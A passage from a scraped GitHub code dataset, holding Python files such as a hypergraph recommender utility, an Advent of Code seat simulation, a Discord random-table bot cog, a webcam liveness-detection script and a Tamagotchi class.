format\"\"\"\n contents = open(filename, 'r').readlines()\n ui_test_dict = defaultdict(list)\n for content in contents:\n content = content.split()\n u, items = int(content[0]), [int(i) for i in content[1:]]\n ui_test_dict[u] = items\n return ui_test_dict\n\n\ndef load_file_to_list_format(filename):\n \"\"\"Convert data into two List(s) format\"\"\"\n contents = open(filename, 'r').readlines()\n train_u, train_i = [], []\n for content in contents:\n content = content.split()\n u = int(content[0])\n train_u.extend([u] * len(content[1:]))\n for i in content[1:]:\n train_i.append(int(i))\n\n return train_u, train_i\n\n\ndef compute_hyper_graph_adj(h):\n \"\"\"Based on Hyper-graph matrix H, compute final normalized adjacency matrix\"\"\"\n dv = np.array(h.sum(1))\n d_inv = np.power(dv, -0.5).flatten()\n d_inv[np.isinf(d_inv)] = 0.\n dv = sp.diags(d_inv)\n\n de = np.array(h.sum(0))\n d_ine = np.power(de, -1).flatten()\n d_ine[np.isinf(d_ine)] = 0.\n de = sp.diags(d_ine)\n\n # D_v^{-\\frac{1}{2}} H D_e^{-1} H^T D_v^{-\\frac{1}{2}}\n return dv.dot(h).dot(de).dot(h.T).dot(dv)\n\n\ndef construct_group_graph(gu_dict, gi_dict, num_groups):\n matrix = np.zeros((num_groups, num_groups))\n\n for g in range(num_groups):\n g1_member = set(gu_dict.get(g, []))\n g1_item = set(gi_dict.get(g, []))\n\n for g2 in range(g + 1, num_groups):\n g2_member = set(gu_dict.get(g2, []))\n g2_item = set(gi_dict.get(g2, []))\n\n member_overlap = g1_member & g2_member\n member_union = g1_member | g2_member\n\n item_overlap = g1_item & g2_item\n item_union = g1_item | g2_item\n\n if (len(member_union) + len(item_union)) == 0:\n matrix[g][g2] = matrix[g2][g] = 0.0\n continue\n\n matrix[g][g2] = float((len(member_overlap) + len(item_overlap)) / (len(member_union) + len(item_union)))\n matrix[g2][g] = matrix[g][g2]\n\n matrix = matrix + np.diag([1.0] * num_groups)\n degree = np.sum(np.array(matrix), 1)\n return np.dot(np.diag(1.0 / degree), matrix)\n","repo_name":"WxxShirley/CIKM2023DiRec","sub_path":"baselines/GRModels/ConsRec/datautil.py","file_name":"datautil.py","file_ext":"py","file_size_in_byte":2913,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"48"} +{"seq_id":"5228236739","text":"#!/usr/bin/env python\n\n# Advent of Code 2020\n# https://adventofcode.com/2020/day/11\n\nimport sys\nimport copy\n\nFLOOR = \".\"\nOCCUPIED = \"#\"\nEMPTY = \"L\"\n\ndirections = (\n (-1, -1), (-1, 0), (-1, 1),\n (0, -1), (0, 1),\n (1, -1), (1, 0), (1, 1)\n)\n\n\ndef count_occupied_around(layout, i, j):\n occupied, height, width = 0, len(layout), len(layout[0])\n for row_move, col_move in directions:\n a, b = i + row_move, j + col_move\n if 0 <= a < height and 0 <= b < width:\n occupied += layout[a][b] == OCCUPIED\n return occupied\n\n\ndef count_visible_occupied(layout, i, j):\n occupied, height, width = 0, len(layout), len(layout[0])\n for row_move, col_move in directions:\n a, b = i + row_move, j + col_move\n while 0 <= a < height and 0 <= b < width:\n state = layout[a][b]\n if state != FLOOR:\n occupied += state == OCCUPIED\n break\n else:\n a, b = a + row_move, b + col_move\n return occupied\n\n\ndef apply_rules(layout, i, j, occupied_threshold, seat_count_f):\n pre = layout[i][j]\n\n if pre == FLOOR:\n return pre\n\n occupied_count = seat_count_f(layout, i, j)\n\n if pre == OCCUPIED and occupied_count >= occupied_threshold:\n return EMPTY\n\n if pre == EMPTY and occupied_count == 0:\n return OCCUPIED\n\n return pre\n\n\ndef round(layout, occupied_threshold, seat_count_f):\n changed, height, width = False, len(layout), len(layout[0])\n new_layout = copy.deepcopy(layout)\n for row in range(height):\n for col in range(width):\n new_layout[row][col] = apply_rules(layout, row, col, occupied_threshold, seat_count_f)\n changed = changed or (layout[row][col] != new_layout[row][col])\n return (changed, new_layout)\n\n\ndef change_until_stable(layout, occupied_threshold, seat_count_f):\n while True:\n changed, new_layout = round(layout, occupied_threshold, seat_count_f)\n if not changed:\n break\n layout = new_layout\n return layout\n\n\ndef read_seat_layout():\n return [[c for c in line.strip()] for line in sys.stdin.readlines() if line.strip()]\n\n\noriginal = read_seat_layout()\n\nlayout = change_until_stable(copy.deepcopy(original), 4, count_occupied_around)\noccupied = sum(sum(1 for seat in row if seat == OCCUPIED) for row in layout)\nprint(f'Part 1: #Seats occupied: {occupied}')\n\nlayout = change_until_stable(copy.deepcopy(original), 5, count_visible_occupied)\noccupied = sum(sum(1 for seat in row if seat == OCCUPIED) for row in layout)\nprint(f'Part 2: #Seats occupied: {occupied}')\n","repo_name":"danyluis/aoc","sub_path":"2020/11-seat-layout/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"28537078755","text":"from django.contrib import admin\n\nfrom .models import Classe\n\n# Register your models here.\n\n# class ProfessorInline(admin.TabularInline):\n# \tmodel = Classe.professors.through\n\nclass ClasseModelAdmin(admin.ModelAdmin):\n\t\n\tlist_display = [\n\t\t'__str__',\n\t\t'nom',\n\t]\n\n\t# inlines = [\n\t# \tProfessorInline,\n\t# ]\n\n\t# search_fields = [\n\t# \t'curs',\n\t# ]\n\n\tclass Meta:\n\t\tmodel = Classe\n\t\tfields = [\n\t\t\t'id',\n\t\t\t'nom',\n\t\t\t'curs',\n\t\t\t'assignatures',\n\t\t\t'alumnes'\n\t\t]\n\nadmin.site.register(Classe, ClasseModelAdmin)","repo_name":"adriamoya/teach-app","sub_path":"backend/classes/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"41283729748","text":"import FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"Demo\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\n#process.MessageLogger.cerr.FwkReport.reportEvery = 10\n\n#process.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nfrom Configuration.AlCa.GlobalTag_condDBv2 import GlobalTag\nprocess.GlobalTag = GlobalTag(process.GlobalTag, 'auto:run2_mc_hi', '')\n\nprocess.load(\"RecoHI.HiCentralityAlgos.CentralityBin_cfi\")\nprocess.centralityBin.Centrality = cms.InputTag(\"hiCentrality\")\nprocess.centralityBin.centralityVariable = cms.string(\"HFtowers\")\nprocess.centralityBin.nonDefaultGlauberModel = cms.string(\"HydjetDrum5\")\n\nprocess.GlobalTag.toGet.extend([\n cms.PSet(record = cms.string(\"HeavyIonRcd\"),\n tag = cms.string(\"CentralityTable_HFtowers200_HydjetDrum5_v750x02_mc\"),\n connect = cms.string(\"frontier://FrontierProd/CMS_CONDITIONS\"),\n label = cms.untracked.string(\"HFtowersHydjetDrum5\")\n ),\n])\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(),\n duplicateCheckMode = cms.untracked.string(\"noDuplicateCheck\")\n)\nimport FWCore.Utilities.FileUtils as FileUtils\nmylist = FileUtils.loadListFromFile ('filelistAll.txt')\nfor fname in mylist:\n process.source.fileNames.append('file:%s' % (fname))\n\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName=cms.string(\"histogram_testMB_5020GeV.root\")\n)\n\nprocess.demo = cms.EDAnalyzer('TestAnalysis',\n CentralitySrc = cms.InputTag(\"hiCentrality\"),\n centralityBinLabel = cms.InputTag(\"centralityBin\",\"HFtowers\"),\n srcTracks = cms.InputTag(\"hiGeneralTracks\"),\n srcVertex= cms.InputTag(\"hiSelectedVertex\"),\n UseQuality = cms.bool(True),\n TrackQuality = cms.string('highPurity'),\n trackEtaCut = cms.double(2.4),\n trackPtCut = cms.double(0.3),\n# srcTracksPixel = cms.InputTag(\"hiGeneralAndPixelTracks\")\n srcTracksPixel = cms.InputTag(\"hiGeneralTracks\")\n)\n\n\nprocess.p = cms.Path(process.centralityBin * process.demo)\n","repo_name":"tuos/Centrality","sub_path":"ppRECO/produceIDTree_2/TestAnalysis/test/validateCent/cent0/ConfFile_cfg.py","file_name":"ConfFile_cfg.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5076891962","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Oct 6 18:49:58 2021\r\n\r\n@author: vnarayana\r\n\"\"\"\r\n\r\nfrom scipy.stats import truncnorm\r\nimport matplotlib.pyplot as plt\r\n\r\ndef get_truncated_normal(mean=1.7, sd=0.5, low=5, upp=20):\r\n return truncnorm(\r\n (low - mean) / sd, (upp - mean) / sd, loc=mean, scale=sd)\r\n\r\nX = get_truncated_normal(mean=8, sd=2, low=1, upp=10)\r\na = X.rvs(10)\r\n\r\n\r\nfig, ax = plt.subplots()\r\nax.hist(X.rvs(400), density=True,bins =10)\r\nplt.show()","repo_name":"vnarayana0907/PythonNanoparticle-Simulation","sub_path":"sd.py","file_name":"sd.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40758725221","text":"class Evaluation:\n def __init__(self, predictionRankLists, answerRankLists):\n self._predictionRankLists = predictionRankLists;\n self._answerRankLists = answerRankLists;\n\n def evaluateMeanAveragePrecision(self, topRankK):\n meanAveragePrecision = 0.0;\n\n for (q, predictionRankList) in enumerate(self._predictionRankLists):\n averagePrecision = 0.0;\n trueRelevanceCount = 0;\n\n for (r, documentID) in enumerate(predictionRankList):\n if r >= topRankK:\n break;\n if documentID in self._answerRankLists[q]:\n rank = r + 1;\n trueRelevanceCount += 1;\n averagePrecision += float(trueRelevanceCount) / rank;\n\n averagePrecision /= len(self._answerRankLists[q]);\n meanAveragePrecision += averagePrecision;\n print(\"\\t\\tAverage precision for the query %d: %f\" % (q, averagePrecision));\n\n meanAveragePrecision /= len(self._predictionRankLists);\n return meanAveragePrecision;\n","repo_name":"chinchi-hsu/SimpleRetrievalSystem","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":1076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37369486482","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport numpy as np \nimport keras\nfrom keras.models import model_from_json\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv3D, MaxPooling3D\nfrom keras import backend as K\n\n\ndef get_liveness_model():\n\n model = Sequential()\n model.add(Conv3D(32, kernel_size=(3, 3, 3),\n activation='relu',\n input_shape=(24,100,100,1)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Conv3D(64, (3, 3, 3), activation='relu'))\n model.add(MaxPooling3D(pool_size=(2, 2, 2)))\n model.add(Dropout(0.25))\n model.add(Flatten())\n model.add(Dense(128, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n\n return model\n\n\n# In[3]:\n\n\nimport face_recognition\nimport cv2\nimport numpy as np \n#from livenessmodel import get_liveness_model\n#from common import get_users\nfont = cv2.FONT_HERSHEY_DUPLEX\n\n# Get the liveness network\nmodel = get_liveness_model()\n\n# load weights into new model\nmodel.load_weights(\"/Users/olive.chaudhuri/Downloads/model.h5\")\nprint(\"Loaded model from disk\")\n\n\n# In[4]:\n\n\nimport face_recognition\nfrom os import listdir\nfrom os.path import isfile, join\nfrom glob import glob\n\ndef get_users():\n\n known_names=[]\n known_encods=[]\n\n for i in glob(\"/Users/olive.chaudhuri/Downloads/people/*.jpg\"):\n img = face_recognition.load_image_file(i)\n encoding = face_recognition.face_encodings(img)[0]\n known_encods.append(encoding)\n known_names.append(i[7:-4])\n print(\"Loaded image from disk\")\n\n\n return known_names, known_encods\n\n\n# In[5]:\n\n\n# Read the users data and create face encodings \nknown_names, known_encods = get_users()\n\n\nvideo_capture = cv2.VideoCapture(0)\nvideo_capture.set(3, 640)\nvideo_capture.set(4, 480)\n\n# Initialize some variables\nface_locations = []\nface_encodings = []\nface_names = []\nprocess_this_frame = True\ninput_vid = []\n\n\n# In[6]:\n\n\nwhile True:\n # Grab a single frame of video\n if len(input_vid) < 24:\n\n ret, frame = video_capture.read()\n\n liveimg = cv2.resize(frame, (100,100))\n liveimg = cv2.cvtColor(liveimg, cv2.COLOR_BGR2GRAY)\n input_vid.append(liveimg)\n else:\n ret, frame = video_capture.read()\n\n liveimg = cv2.resize(frame, (100,100))\n liveimg = cv2.cvtColor(liveimg, cv2.COLOR_BGR2GRAY)\n input_vid.append(liveimg)\n inp = np.array([input_vid[-24:]])\n inp = inp/255\n inp = inp.reshape(1,24,100,100,1)\n pred = model.predict(inp)\n input_vid = input_vid[-25:]\n\n if pred[0][0]> .95:\n\n # Resize frame of video to 1/4 size for faster face recognition processing\n # performance testing needed -> on full frame !! (ask team)\n small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)\n\n # Only process every other frame of video to save time\n if process_this_frame:\n # Find all the faces and face encodings in the current frame of video\n face_locations = face_recognition.face_locations(small_frame)\n face_encodings = face_recognition.face_encodings(small_frame, face_locations)\n name = \"Unknown\"\n face_names = []\n for face_encoding in face_encodings:\n for ii in range(len(known_encods)):\n \n # known face match\n \n # Use FreeChargeDB to get list of users with faces\n match = face_recognition.compare_faces([known_encods[ii]], face_encoding)\n\n if match[0]:\n name = known_names[ii]\n\n face_names.append(name)\n\n process_this_frame = not process_this_frame\n\n #VALID FC USERS FASTER UNLOCK\n unlock = False\n for n in face_names:\n\n if n != 'Unknown':\n unlock=True\n\n #results\n for (top, right, bottom, left), name in zip(face_locations, face_names):\n \n # NOT SURE ABOUT SCALING TO 4x4 (ask team)\n top *= 4\n right *= 4\n bottom *= 4\n left *= 4\n\n # Face box\n cv2.rectangle(frame, (left, top), (right, bottom), (0, 127, 255), 2)\n\n # name box\n cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)\n \n cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)\n \n cv2.putText(frame, 'VALID!', (frame.shape[1]//2, frame.shape[0]//2), font, 1.0, (255, 255, 255), 1)\n else:\n cv2.putText(frame, 'SPOOF WARNING!', (frame.shape[1]//2, frame.shape[0]//2), font, 1.0, (255, 255, 255), 1)\n # Display the liveness score in top left corner \n cv2.putText(frame, str(pred[0][0]), (20, 20), font, 1.0, (255, 255, 0), 1)\n # Display the resulting image\n cv2.imshow('Video', frame)\n\n #quit \n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# Release handle to the webcam\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n\n# In[7]:\n\n\nvideo_capture.release()\ncv2.destroyAllWindows()\n\n","repo_name":"olive268/hackathon","sub_path":"model/Better(1).py","file_name":"Better(1).py","file_ext":"py","file_size_in_byte":5577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6412065392","text":"\"\"\"last update ts\n\nRevision ID: 15b1d33fd8ac\nRevises: a20ebbb175f2\nCreate Date: 2021-12-14 21:32:55.885212\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '15b1d33fd8ac'\ndown_revision = 'a20ebbb175f2'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('updated_datetime', sa.DateTime(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('user', 'updated_datetime')\n # ### end Alembic commands ###\n","repo_name":"LuckyStarTF2/help.tf","sub_path":"migrations/versions/15b1d33fd8ac_last_update_ts.py","file_name":"15b1d33fd8ac_last_update_ts.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7663757442","text":"def findComplement(self, num: int) -> int:\n\n x = bin(num).replace('0b','')\n print(x)\n\n st = \"\"\n for i in x:\n if i == '1':\n st += '0'\n if i == '0':\n st += '1'\n\n return int(st,2)\n","repo_name":"Rahul140799/Placement-Kit","sub_path":"LeetCode/complement(bin_to_dec).py","file_name":"complement(bin_to_dec).py","file_ext":"py","file_size_in_byte":264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16556160235","text":"#!/usr/bin/python\n\nimport rospy\nimport sys, select, termios, tty\nfrom std_msgs.msg import Float64MultiArray\n\nclass LECTURE_KEY: \n\n def __init__(self):\n self.order = Float64MultiArray()\n\n self.v_crucero = rospy.get_param(\"/vel_cruc\")\n self.w_max = rospy.get_param(\"/w_max\")\n self.f = rospy.get_param(\"/f\")\n\n self.key_timeout = rospy.get_param(\"~key_timeout\", 0.0)\n if self.key_timeout == 0.0:\n self.key_timeout = None\n\n self.nameTopicPub1 = \"/vel_order\"\n\n self.pub1 = rospy.Publisher(self.nameTopicPub1,Float64MultiArray,queue_size=10)\n \n rate = rospy.Rate(self.f)\n self.vel_y = 0\n self.w = 0\n self.quit = False\n self.key = ' '\n\n while (not rospy.is_shutdown()):\n if(~self.quit):\n self.detectar_key()\n else:\n break\n \n rate.sleep()\n \n def detectar_key(self):\n \n self.key = getKey(self,self.key_timeout)\n \n if self.key in moveBindings.keys():\n if ((self.key == 'q') | (self.key == 'Q')):\n self.quit = True\n elif (self.key == ' '):\n self.vel_y = moveBindings[self.key][0]\n self.w = moveBindings[self.key][1]\n else:\n self.vel_y = self.vel_y + moveBindings[self.key][0]\n self.w = self.w + moveBindings[self.key][1]\n \n if (self.vel_y >= self.v_crucero):\n self.vel_y = self.v_crucero\n elif (self.vel_y <= -self.v_crucero):\n self.vel_y = -self.v_crucero\n \n if (self.w >= self.w_max):\n self.w = self.w_max\n elif (self.w <= -self.w_max):\n self.w = -self.w_max\n\n self.order.data = [self.vel_y,self.w]\n self.pub1.publish(self.order)\n\nsettings = termios.tcgetattr(sys.stdin)\n\ndef getKey(self,key_timeout):\n tty.setraw(sys.stdin.fileno())\n rlist, _, _ = select.select([sys.stdin], [], [], key_timeout)\n if rlist:\n key = sys.stdin.read(1)\n else:\n key = ''\n termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n return key\n\nmoveBindings = {\n 's':(-0.1,0.0),\n 'S':(-0.1,0.0),\n 'w':(0.1,0.0),\n 'W':(0.1,0.0),\n 'a':(0.0,-0.3),\n 'A':(0.0,-0.3),\n 'd':(0.0,0.3),\n 'D':(0.0,0.3),\n ' ':(0.0,0.0),\n 'q':(0.0,0.0),\n 'Q':(0.0,0.0)\n }","repo_name":"johanhiguera/Rover","sub_path":"scripts/class_lecture_key.py","file_name":"class_lecture_key.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"71960354387","text":"## Template for binary search\n\nfrom typing import List\n\nclass Solution:\n ## case 1: basic case ---> find target\n def search(self, nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n \n while(left <= right):\n mid = left + (right -left) // 2 ## avoid int overflowing\n if (nums[mid] == target):\n return mid\n elif (nums[mid] > target):\n right = mid - 1\n elif (nums[mid] < target):\n left = mid + 1\n\n return -1\n \n ## Case 2: find target and find its lower bound\n def left_bound(nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while(left <= right):\n mid = left + (right-left) // 2\n if nums[mid] == target:\n right = mid -1\n elif nums[mid] > target:\n right = mid - 1\n elif nums[mid] < target:\n left = mid + 1\n if left == len(nums):\n return -1\n return left if nums[left] == target else -1\n\n ## Case 3: find target and find its higher bound\n def right_bound(nums: List[int], target: int) -> int:\n left = 0\n right = len(nums) - 1\n\n while(left <= right):\n mid = left + (right-left) // 2\n if nums[mid] == target:\n left = mid + 1\n elif nums[mid] > target:\n right = mid - 1\n elif nums[mid] < target:\n left = mid + 1\n if left - 1 < 0:\n return -1\n return left-1 if nums[left-1] == target else -1","repo_name":"xinghao302001/LeetCodeFun","sub_path":"Binary Search/LC704.py","file_name":"LC704.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4991858306","text":"def square(side):\n perimeter = side * 4\n square = side * side\n diagonal = (side**2 + side**2)**0.5\n return(perimeter, square, diagonal)\n\n\nwhile True:\n try:\n side = int(input())\n print(square(side))\n except ValueError:\n print(\"Error. Please enter an integer\")\n","repo_name":"Juxsiy/Python-nuggets","sub_path":"square_side.py","file_name":"square_side.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41933760264","text":"import discord\nimport traceback\n\nfrom .lt_logger import lt_logger\nfrom discord.ext import commands\nfrom random import randint\n\n\nclass rand(commands.Cog):\n def __init__(self, bot, lt_db, channel):\n self.bot = bot\n self.db = lt_db\n self.logger = lt_logger\n self.settings = [\"deck\", \"public\"]\n self.channel = channel\n\n # region Utility\n\n def ctx_info(self, ctx):\n Guild = ctx.message.guild.id\n ID = ctx.message.author.id\n return Guild, ID\n\n def weighted(self, pairs):\n total = sum(int(pair[1]) for pair in pairs)\n r = randint(1, total)\n\n for (value, weight) in pairs:\n r -= int(weight)\n if r <= 0:\n return value\n\n # endregion\n\n # region Random Tables\n\n @commands.group(case_insensitive=True, aliases=[\"rand\"])\n async def random(self, ctx):\n \"\"\"\n The Random command group surrounds the use of custom random tables which can be \"rolled\" on to give a random output. These tables can be weighted, or you can leave the \"weight\" argument at 1 for all entries for an unweighted table. Subcommands can only be used by the original creator of a table.\n\n If you're wishing to roll on a random table, use this command followed by the table name, i.e. `.random Table2`\n \"\"\"\n if ctx.invoked_subcommand is None:\n Table = ctx.message.content.split(\" \", 1)[1]\n try:\n await self.get(ctx, Table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n @random.command(case_insensitive=True)\n async def multi(self, ctx, Table, num: int):\n \"\"\"\n Run multiple .random commands on the provided table.\n \"\"\"\n for x in range(0, num):\n try:\n await self.get(ctx, Table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n @random.command(case_insensitive=True)\n async def list(self, ctx, scope=None):\n \"\"\"\n Lists all random tables that you have created.\n \"\"\"\n\n try:\n if scope != \"all\":\n tables = self.db.rand_get_owned(\n ctx.message.author.id, ctx.message.guild.id\n )\n title = f\"Random Tables owned by {ctx.message.author.display_name}\"\n else:\n tables = self.db.rand_get_all(ctx.message.guild.id)\n title = \"All Tables\"\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n\n outString = \"\"\n for table in tables:\n outString += f\"{table['table'].title()}\\n\"\n\n embed = discord.Embed(\n title=title,\n description=outString,\n color=0x00FF00,\n )\n await ctx.send(embed=embed)\n\n @random.command(case_insensitive=True)\n async def display(self, ctx, Table):\n \"\"\"\n Displays a random table.\n \"\"\"\n try:\n table = self.db.rand_get(ctx.message.guild.id, Table)\n print(table)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"random\", self.ctx.author\n )\n outString = \"```\"\n for value in table[\"pairs\"]:\n outString += f\"{value[1]} - {value[0]}\\n\"\n outString += \"```\"\n\n embed = discord.Embed(\n title=f\"Random Table: {table['table']}\",\n description=outString,\n color=0x00FF00,\n )\n await ctx.send(embed=embed)\n\n @random.command(case_insensitive=True)\n async def new(self, ctx, Table):\n \"\"\"\n Adds a new table to the random tables for the server it is called in. Multiple word table names - \"Wild Magic\" for instance, must be surrounded in quotation marks.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.rand_new(Guild, ID, Table)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(self, message, self.__class__.__name__, \"New Table\")\n\n @random.command(case_insensitive=True, aliases=[\"add\"])\n async def add_entry(self, ctx, Table, Weight, *, Value):\n \"\"\"\n Adds a new weighted entry to the table. The table name requires quotation marks if it is longer than two words; the value does not.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.rand_add(Guild, ID, Table, Weight, Value)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(self, message, self.__class__.__name__, \"add_entry\")\n\n @random.command(case_insensitive=True, aliases=[\"remove\"])\n async def remove_entry(self, ctx, Table, *, Value):\n \"\"\"\n Removes a weighted entry from the table. The table name requires quotation marks if it is longer than two words; the value does not.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n output = self.db.rand_remove(Guild, ID, Table, Value)\n await ctx.send(output)\n\n @random.command(case_insensitive=True)\n async def delete(self, ctx, Table):\n \"\"\"\n Deletes the specified table from the database. This is not reversible.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n output = self.db.rand_delete(Guild, ID, Table)\n await ctx.send(output)\n\n @random.command(case_insensitive=True, hidden=True)\n async def get(self, ctx, Table):\n\n Guild = ctx.message.guild.id\n image_ext = [\"jpg\", \"png\", \"jpeg\", \"gif\"]\n\n try:\n result = self.db.rand_get(Guild, Table)\n\n result[\"pairs\"] = [tuple(x) for x in result[\"pairs\"]]\n randout = self.weighted(result[\"pairs\"])\n\n if result[\"deckMode\"] == \"on\":\n ID = ctx.message.author.id\n mid = result[\"_id\"]\n output = self.db.deck_draw(Guild, ID, mid, randout)\n print(output)\n\n embed = discord.Embed(\n title=\"__\" + result[\"table\"].title() + \"__\",\n description=f\"{ctx.message.author.display_name} rolled on the {Table.title()} random table!\",\n color=ctx.message.author.color,\n )\n\n if randout[0:4] == \"http\" and randout.split(\".\")[-1] in image_ext:\n embed.set_image(url=randout)\n\n else:\n embed.add_field(name=\"Random Result\", value=randout)\n await ctx.send(embed=embed)\n\n except:\n await ctx.send(\n f'It looks like the \"{Table}\" doesn\\'t exist yet, or your spelling is incorrect.'\n )\n raise Exception()\n\n @random.command()\n async def toggle(self, ctx, Table, Setting):\n \"\"\"Toggles a designated mode for the provided random table.\n\n Currently settings are Public and DeckMode\"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.toggle(Guild, ID, Table, Setting)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Random Table Toggle\"\n )\n\n @random.command(aliases=[\"reset\"])\n async def shuffle(self, ctx, Table):\n \"\"\"\n Shuffle entries back into the deck in deckmode.\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n output = self.db.deck_shuffle(Guild, ID, Table)\n await ctx.send(output)\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Deck Shuffle\"\n )\n\n @random.command(aliases=[\"return\"])\n async def return_one(self, ctx, Table, Value):\n \"\"\"\n Return one entry to the deck in deckmode. WIP\n \"\"\"\n Guild, ID = self.ctx_info(ctx)\n try:\n pass\n except:\n message = str(traceback.format_exc())\n await self.logger.error(\n self, message, self.__class__.__name__, \"Return One\"\n )\n\n\n# endregion\n\n\ndef setup(bot):\n bot.add_cog(rand(bot))\n","repo_name":"CaydenCailean/littlethunder","sub_path":"cogs/rand.py","file_name":"rand.py","file_ext":"py","file_size_in_byte":8719,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"10483114162","text":"import datetime\nimport random\nimport time\nnow = datetime.datetime.now()\n\nclass Tamagotchi: # yikes o\n\n def __init__(self, name):\n self.sleepTimer = 100\n self.sickTimer = 5\n self.age = 0\n self.name = name\n self.condition = {\"food\": 100, \"happy\": 100, \"energy\": 100, \"health\": 100, \"discipline\": 0}\n self.isDead = False\n self.isSick = False\n self.isAsleep = False\n self.pooDroppings = 0\n self.expression = \"O\"\n self.drawing = \"O\"\n self.deathNote = \"\"\n\n def __str__(self):\n returnString = \"\"\n returnString += \"food meter: \" + str(self.condition[\"food\"]) + '\\n'\n returnString += \"happy meter: \" + str(self.condition[\"happy\"]) + '\\n'\n returnString += \"energy meter: \" + str(self.condition[\"energy\"]) + '\\n'\n returnString += \"health meter: \" + str(self.condition[\"health\"]) + '\\n'\n returnString += self.drawing\n if self.isSick == True:\n returnString += '\\nYour tamagotchi is sick...'\n return returnString\n\n def capValues(self):\n if self.condition[\"food\"] > 100:\n self.condition[\"food\"] = 100\n if self.condition[\"happy\"] > 100:\n self.condition[\"happy\"] = 100\n if self.condition[\"energy\"] > 100:\n self.condition[\"energy\"] = 100\n if self.condition[\"health\"] > 100:\n self.condition[\"health\"] = 100\n if self.condition[\"discipline\"] < 0:\n self.condition[\"discipline\"] = 0\n if self.pooDroppings<-1:\n self.pooDroppings = 0\n\n def feedTamagotchi(self):\n if self.isAsleep == False:\n ranNum = random.randint(0, self.condition[\"discipline\"])\n if ranNum == 0:\n return \"Your tamagotchi refused to eat!\"\n self.condition[\"food\"]+=8\n if self.condition[\"food\"] > 100:\n self.condition[\"health\"]-=20\n self.capValues()\n\n def scoldTamagotchi(self):\n if 